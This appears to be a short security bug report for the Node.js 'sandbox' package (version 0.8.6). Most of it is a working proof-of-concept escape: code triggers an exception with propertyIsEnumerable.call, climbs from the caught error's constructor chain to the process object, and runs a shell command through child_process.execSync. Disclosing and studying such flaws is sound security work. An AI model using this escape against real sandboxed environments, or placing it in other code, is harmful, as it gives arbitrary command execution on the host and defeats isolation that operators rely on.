Sandbox Escape Bug

[seongil-wi]

• Sandbox version: 0.8.6
• Node version: 18.15.0

var Sandbox = require("sandbox")
var code = `
try{
    propertyIsEnumerable.call(undefined,);
} catch (pp) {
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
`

s = new Sandbox()
s.run(code)

Sandbox can be escaped by calling propertyIsEnumerable.call function.
Also, we can execute arbitrary shell code using process module.